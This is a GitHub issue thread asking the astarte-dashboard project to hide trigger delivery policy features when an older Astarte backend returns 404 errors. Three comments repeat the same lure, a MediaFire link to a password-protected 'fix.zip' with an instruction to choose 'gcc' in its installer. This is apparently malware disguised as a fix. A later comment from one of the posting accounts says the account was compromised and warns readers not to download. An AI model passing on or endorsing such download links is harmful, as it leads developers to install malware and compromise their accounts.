### ISSUE TITLE
Disable/hide UI about trigger delivery policies if Astarte does not support them

### ISSUE THREAD

**Issue by davidebriani** [astarte-platform/astarte-dashboard#459]
The Dashboard currently assumes that trigger delivery policies are supported by Astarte.
However, the underlying Astarte instance could be older than the Dashboard and it may not support this feature.

In this case, for example, when opening the "Trigger" or "Create Trigger" pages the Dashboard fails to load the list of policies and continuously flash error messages to the user: `Could not retrieve trigger delivery policies for trigger: Request failed with status code 404`.

The Dashboard could:
1. initially verify whether the Astarte instance supports the feature (by querying for the versions of the Astarte services)
2. avoid displaying/using functionalities about trigger delivery policies (such as attempting to list the policies).

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT OR ANY OTHER MEDIAFIRE LINKS, MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS AND YOURS WILL END UP BEING USED AS WELL**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**
